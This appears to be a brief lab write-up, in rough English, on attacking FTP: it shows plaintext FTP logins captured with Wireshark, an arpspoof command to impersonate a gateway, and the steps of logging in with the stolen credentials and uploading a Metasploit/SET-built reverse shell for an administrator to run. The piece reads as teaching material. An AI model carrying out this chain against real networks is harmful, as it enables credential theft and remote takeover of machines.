FTP (File Transfer Protocol) is one of the protocols in the TCP/IP protocol suite.
But he has an inevitable loophole that is FTP user name clear text password verification.
When the FTP protocol is used for user authentication, the client and server interact through plain text.
In the experiment,
first use kali to connect to port 21 of the target machine
and open the wireshark to capture the ftp. It
can be found that the transmission is plaintext.
Then we can use the tool arpspoof to perform arp sniffing and pretend to be a gateway to perform arp spoofing on the host with the target ip 192.168.19.106
arpspoof -i eth0 192.168.1.1 -t 192.168.19.106
At the same time, open the wirehark to capture the package and
get the user name and password
admin1
123,
then log in to ftp and
use metapolit to create a rebound shell and upload to the ftp server. Use setookit to quickly generate a rebound shell.
When the administrator clicks on the shell, we can get the cmd execution permission of the target machine.